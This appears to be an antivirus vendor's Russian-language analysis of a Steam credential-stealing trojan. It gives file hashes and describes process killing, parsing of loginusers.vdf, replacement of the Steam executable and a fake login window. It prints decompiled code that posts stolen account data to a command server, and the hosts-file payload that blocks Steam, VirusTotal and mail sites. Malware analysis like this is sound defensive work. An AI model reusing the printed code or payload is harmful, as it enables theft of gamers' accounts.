SHA1
- c58d6ff1237c6d9a4c52ec16808d6aaea75bc744
- fada030ae7b23b3599856f45824d2d2297407907
Троянец для кражи учетных записей пользователей Steam. Завершает работающие процессы Steam (если это не процесс самого троянца) и GameOverlayUI. С использованием системного реестра Windows определяет путь до директории Steam, языковые настройки операционной системы и имя пользователя из поля AutoLoginUser.
В папке Steam троянец проверяет наличие файла \config\loginusers.vdf: если файл присутствует, вредоносная программа выполняет его синтаксический разбор и извлекает из него пары вида «имя учетной записи <=> steamid64». Удаляет из каталога Steam файлы \config\config.vdf и \config\DialogConfig.vdf.
Собранную информацию троянец отсылает на управляющий сервер:
nameValueCollection.Add("type", "s");
nameValueCollection.Add("keyAccess", "704ef3531ab584ec3fec69d4e07e5bbb");
nameValueCollection.Add("systemOS", osName);
nameValueCollection.Add("systemUser", userName);
nameValueCollection.Add("systemMachine", machineName);
nameValueCollection.Add("languageOS", englishName);
nameValueCollection.Add("steamids", value);
nameValueCollection.Add("steamPath", Class2.Class3.SteamPath);
nameValueCollection.Add("steamLang", Class2.Class3.language);
nameValueCollection.Add("steamRememberL", Class2.Class3.AutoLoginUser);
new WebClient().UploadValues(Class2.Class3.cnc_address, "POST", nameValueCollection);
Поле steamids содержит список пар из steamid64 и имен учетных записей, разделенных символом ";".
Затем вредоносная программа проверяет, подменила ли она оригинальный исполняемый файл приложения Steam. Если нет, удаляет файл приложения и копирует себя на его место.
Изменяет содержимое файла %SYSTEM%\drivers\etc\hosts:
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n127.0.0.1 steampowered.com\n127.0.0.1 support.steampowered.com\n127.0.0.1 store.steampowered.com\n127.0.0.1 help.steampowered.com\n127.0.0.1 forums.steampowered.com\n127.0.0.1 crash.steampowered.com\n127.0.0.1 dota2lounge.com\n127.0.0.1 csgolounge.com\n127.0.0.1 virustotal.com\n127.0.0.1 mail.google.com\n127.0.0.1 mail.ru\n127.0.0.1 ukr.net\n127.0.0.1 rambler.ru\n127.0.0.1 yandex.ru\n127.0.0.1 web.de\n127.0.0.1 o2.pl\n127.0.0.1 login.live.com\n127.0.0.1 yahoo.com\n
Затем троянец демонстрирует на экране поддельное окно авторизации в приложении Steam. Если пользователь указал логин и пароль, троянец пытается авторизоваться в Steam с его учетной записью. В случае успешной авторизации, если на компьютере включен Steam Guard, троянец демонстрирует на экране окно для ввода кода. Полученные данные вредоносная программа высылает на управляющий сервер.
